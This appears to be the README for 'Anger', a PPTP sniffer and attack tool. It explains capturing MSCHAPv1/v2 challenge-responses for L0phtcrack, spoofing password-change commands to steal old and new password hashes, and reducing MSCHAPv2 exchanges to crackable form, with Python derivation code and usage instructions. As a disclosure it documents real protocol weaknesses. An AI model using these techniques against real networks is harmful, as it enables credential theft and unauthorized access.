Anger is a PPTP sniffer and attack tool. It sniffs PPTP's MSCHAP
challenge/response and outputs it in a format suitable for input
into the L0phtcrack password cracking program. 

It also implements an active attack against the MSCHAPv1 password
change protocol. If enabled, when the program detects a PPTP client
attempting to log on using MSCHAPv1 it will spoof a password change
command from the server. If the user then follows the dialogs to
change his password, the program will recover the hashes of the current
password and the hashes of the new password the user has selected.
These hashes can be input into L0phtcrack to obtain the password, or
they can be used with a modified PPP client together with the Linux
PPTP client to log on to the network.

After the first release of this program Microsoft came up with a new
version of MSCHAP, version 2. The new version is no longer vulnerable
to the password change attack. It also no longer performs a challenge/
response authentication based on the LANMAN hash, and includes
the capability for the client to authenticate the server. 

Microsoft added a number of new steps to the process to generate
a response to a challenge. They use SHA to hash a number of things.
Why they did this is not obvious as it seems to add no security to
the protocol. The hashes can be precomputed by the sniffer and thus
L0phtcrack requires no changes to handle MSCHAPv2.
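
The derivation the paragraph above refers to, as an added example (not code from Anger): RFC 2759 defines ChallengeHash() as SHA-1 over PeerChallenge, AuthenticatorChallenge and UserName, truncated to 8 octets. Since all three inputs are sent in the clear, an observer can compute the same 8-byte challenge the client used, which is why the NT response is no harder to crack than an MSCHAPv1 one. The challenge values and user name are the RFC 2759 section 9.2 test vector; the 24-byte NT-Response is a constructed placeholder.

```python
import hashlib

# RFC 2759 section 9.2 test vector values, used only to check the derivation.
RFC2759_AUTH_CHALLENGE = bytes.fromhex("5B5D7C7D7B3F2F3E3C2C602132262628")
RFC2759_PEER_CHALLENGE = bytes.fromhex("21402324255E262A28295F2B3A337C7E")
RFC2759_USERNAME = b"User"
# Constructed 24-byte NT-Response placeholder; not a real test vector.
CONSTRUCTED_NT_RESPONSE = bytes(range(24))


def challenge_hash(peer_challenge, authenticator_challenge, username):
    """RFC 2759 ChallengeHash(): SHA-1 over PeerChallenge || AuthenticatorChallenge
    || UserName, truncated to 8 octets.  Every input crosses the wire unencrypted
    (authenticator challenge in the Challenge packet, peer challenge and name in
    the Response packet), so a passive observer recovers the same value."""
    if len(peer_challenge) != 16 or len(authenticator_challenge) != 16:
        raise ValueError("MSCHAPv2 challenges are 16 octets each")
    h = hashlib.sha1()
    h.update(peer_challenge)
    h.update(authenticator_challenge)
    h.update(username)
    return h.digest()[:8]


def parse_response_value(value):
    """Split the 49-octet Value field of an MSCHAPv2 Response packet (RFC 2759
    section 4): 16 octets Peer-Challenge, 8 reserved, 24 NT-Response, 1 Flags."""
    if len(value) != 49:
        raise ValueError("MSCHAPv2 Response Value-Size must be 49")
    return {"peer_challenge": value[:16], "nt_response": value[24:48], "flags": value[48]}


def collapse_to_v1_shape(authenticator_challenge, response_value, username):
    """Reduce an MSCHAPv2 exchange to the 8-byte challenge / 24-byte NT response
    pair that MSCHAPv1 crackers already consume.  No LANMAN response exists in
    MSCHAPv2, so that field is reported as 24 zero bytes."""
    fields = parse_response_value(response_value)
    challenge = challenge_hash(fields["peer_challenge"], authenticator_challenge, username)
    return {"challenge": challenge, "nt_response": fields["nt_response"],
            "lanman_response": bytes(24)}


def demo():
    # Build the Response Value exactly as the client would lay it out.
    value = RFC2759_PEER_CHALLENGE + bytes(8) + CONSTRUCTED_NT_RESPONSE + b"\x00"
    return collapse_to_v1_shape(RFC2759_AUTH_CHALLENGE, value, RFC2759_USERNAME)
```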

This version of Anger supports sniffing the MSCHAPv2 challenge/response.
These can also be input into L0phtcrack for cracking. The output lines for
MSCHAPv2 have the LANMAN hash set to all zeros, as it is not available.
You cannot use the command line version of L0phtcrack (version 1.5) to
crack MSCHAPv2 entries: that version does not attempt to crack the
NT response via a dictionary attack unless there is also a LANMAN
response.

You can use the Windows version of L0phtcrack to crack the MSCHAPv2
entries, but you must disable the cracking of the LANMAN hash
(only enable the cracking of the NT hash in the options panel).
This is because L0phtcrack does not recognize the all zeros
LANMAN response field as invalid and will attempt to crack it.
Replacing this field with something else results in a parsing
error.

So it is recommended that you sort MSCHAPv1 and MSCHAPv2 entries into
different files and crack them separately. If you licensed L0phtcrack
you may wish to suggest to @Stake that they detect when the LANMAN
response is not available for an entry and instead crack the NT response.

To compile the program you need the Pcap and OpenSSL libraries
and header files. To compile, use a command line such as:

	gcc -o anger anger.c in_cksum.c -lcrypto -lpcap

usage: anger [ -v ] [ -d device ] output1 [ output2 ]

Write sniffed challenge/responses to output1.
If output2 is given it will perform an active attack on
PPTP connections and write the password hashes to output2.

	-d	Device to open for sniffing.
	-v	Some diagnostics.

aleph1@underground.org
